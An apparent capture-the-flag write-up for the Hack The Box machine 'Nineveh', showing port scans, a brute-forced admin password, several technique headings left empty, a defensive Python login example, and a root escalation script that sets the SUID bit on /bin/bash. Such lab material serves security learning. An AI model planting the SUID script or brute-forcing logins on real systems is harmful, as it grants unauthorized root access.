Nineveh

Operating system: Linux
Difficulty: Medium
Release date: 04 Aug 2017
Creator: Yas3r

Port scan

nmap_ports 10.10.10.43                                                                                                                     
[+] Running: nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 21:14 -03
Initiating SYN Stealth Scan at 21:14
Scanning 10.10.10.43 [65535 ports]
Discovered open port 80/tcp on 10.10.10.43
Discovered open port 443/tcp on 10.10.10.43
Completed SYN Stealth Scan at 21:15, 27.01s elapsed (65535 total ports)
Nmap scan report for 10.10.10.43
Host is up, received user-set (0.29s latency).
Scanned at 2025-04-27 21:14:42 -03 for 27s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds
           Raw packets sent: 131085 (5.768MB) | Rcvd: 23 (1.012KB)

Version and service enumeration

nmap -sCV -p80,443 -oN servicesScan 10.10.10.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 21:15 -03
Nmap scan report for 10.10.10.43 (10.10.10.43)
Host is up (0.25s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.76 seconds

Initial exploitation

HTTP (80)

We know the admin user exists because of the error message the site returns.

We brute-force the login with Hydra

admin:1q2w3e4r5t
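
The login on port 80 confirms valid usernames through its error message, which is what makes the brute force above practical. The following is an added example, not code from the original writeup or the target application: a login check with that leak beside a hardened version with a uniform error and per-name throttling. Function names, messages, thresholds and the user store are assumptions.

```python
import hashlib
import hmac
import os
import time

MAX_FAILURES = 5      # assumed lockout threshold
LOCK_SECONDS = 300    # assumed lockout window

def _record(password):
    """Return (salt, PBKDF2 digest) for storage instead of the password."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def _verify(record, password):
    salt, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(digest, candidate)

# Constructed user store and a dummy record used for unknown usernames.
USERS = {"admin": _record("constructed-sample-passphrase")}
_DUMMY = _record("placeholder")
_failures = {}        # attempted username -> timestamps of recent failures

def login_leaky(user, password):
    """Distinct errors tell a client which usernames exist."""
    if user not in USERS:
        return "Invalid username"
    if not _verify(USERS[user], password):
        return "Invalid password"
    return "OK"

def login_hardened(user, password, now=None):
    """Uniform error, equal hashing work, throttle keyed on the attempted name."""
    now = time.time() if now is None else now
    recent = [t for t in _failures.get(user, []) if now - t < LOCK_SECONDS]
    if len(recent) >= MAX_FAILURES:
        _failures[user] = recent
        return "Too many attempts, try again later"
    # Always run the hash so unknown users cost the same as known ones.
    ok = _verify(USERS.get(user, _DUMMY), password) and user in USERS
    if ok:
        _failures.pop(user, None)
        return "OK"
    _failures[user] = recent + [now]
    return "Invalid username or password"
```

Throttling is applied to unknown names as well, so the lockout message cannot be used as a second enumeration oracle.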

HTTPS (443)

If we run web fuzzing, we find the db directory.

Local File Inclusion

Port Knocking

strings nineveh.png

Privilege escalation (root)

  • https://www.exploit-db.com/exploits/33899

We create an executable, /tmp/update, that sets the SUID bit on bash.

#!/bin/bash

chmod u+s /bin/bash
